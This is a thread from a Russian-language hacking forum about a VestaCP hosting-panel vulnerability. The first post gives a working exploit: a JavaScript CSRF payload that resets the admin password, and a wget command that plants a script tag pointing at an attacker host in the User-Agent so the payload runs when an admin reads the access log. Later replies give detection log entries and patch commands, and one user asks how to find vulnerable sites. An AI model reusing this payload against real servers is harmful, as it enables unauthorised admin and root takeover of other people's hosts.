Серьёзная уязвимость в Vesta Control Panel

  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time

hack-anonim

Пользователь

hack-anonim

Пользователь
24 Окт 2015
572
316
93444063a55d7e39426f6c54ae821104.png

В хостинговой панели VestaCP обнаружена уязвимость, который позволяет злоумышленнику получить админский доступ к панели (а дальше и рутовский к серверу).
Уязвимость базируется на сбросе пароля администратора.
Последовательность взлома (восстанавливалась по логам, что конкретно за баг, пока не афишируется):
  1. Сброс пароля admin (?, как? тут явно дыра, это не брут)​
  2. Выставляется bash для admin, модифицируется крон от админа, в профиле меняется мыло на [email protected]
  3. Дальше доступ в панель и ssh от admin с новым паролем.​
Сплоит для Весты:

Код:
Poc Exploit
================
1.Подготовьте js файл (evil.js):

function csrfWithToken(url,hanimisToken,password){
  $.get(url, function(gelen) {
    $('body').append($(gelen));
    $('form[id="vstobjects"]').css("display","none");
    var token = $(hanimisToken).attr("token");
    $('form[id="vstobjects"]').attr("action",url);
    $('input[name="v_password"]').val(password);
    $('form[id="vstobjects"]').submit();
  });
};
//password = 1234567
csrfWithToken("/edit/user/?user=admin","#token","123456");

2. Сделайте Get-запрос с этим js-файлом:
wget --header="Accept: text/html" --user-agent="<script src='http://evilsite/evil.js'></script>" http://victimserver

3. Дожидаемся когда администратор прочитает access.log, что сделает инъекцию нашего evil.js

4. Логинимся с изменённым паролем:
http(s)://victim:8083/
 
  • Лайк
Reactions: AnGel

AnGel

Администратор
Команда форума

AnGel

Администратор
Команда форума
27 Авг 2015
3,411
2,025
Знал об этом уже как месяца два. В пн вышел патч.
Для тех у кого веста - service vesta stop, и врубаем только для проверки обновы!
Screenshot_2016-06-30-01-04-35.jpg

Откуда это слито?
Массовые атаки пошли с китая по весте, они же и нашли уязвимость...
 

hack-anonim

Пользователь

hack-anonim

Пользователь
24 Окт 2015
572
316
Откуда это слито?
Скрытое содержимое для пользователей: AnGel


Пока рекомендую отключить панель командой:

Код:
service vesta stop
и проверить лог:system.log на следующие записи::

Код:
v-change-user-password 'admin' '******'
v-change-user-language 'admin' 'en'
v-change-user-shell 'admin' 'bash'
v-rebuild-cron-jobs 'admin'
v-change-user-contact 'admin' '[email protected]'
v-change-user-password 'admin' '******'
------------------------------------------------------
v-change-user-password 'admin' '******'
v-change-user-password 'admin' '******'
------------------------------------------------------
v-change-user-password 'admin' '******'
Если есть что-то похожее, то ваша система взломана ! :(
 

AnGel

Администратор
Команда форума

AnGel

Администратор
Команда форума
27 Авг 2015
3,411
2,025
Как установить патч на эту уязвимость:

Подключаемся к серверу через SSH и проверяем обновления
Код:
sudo aptitude update
upload_2016-6-30_1-58-44.png

Устанавливаем обновления:
Код:
sudo aptitude safe-upgrade
upload_2016-6-30_2-0-4.png

После удачного обновления, вы увидите примерно подобную картинку:
upload_2016-6-30_2-0-56.png
 

fenum

VIP

fenum

VIP
1 Фев 2016
534
239
как сайты найти с vesta cp подскажите =)
можно и под личный
 

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2022

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя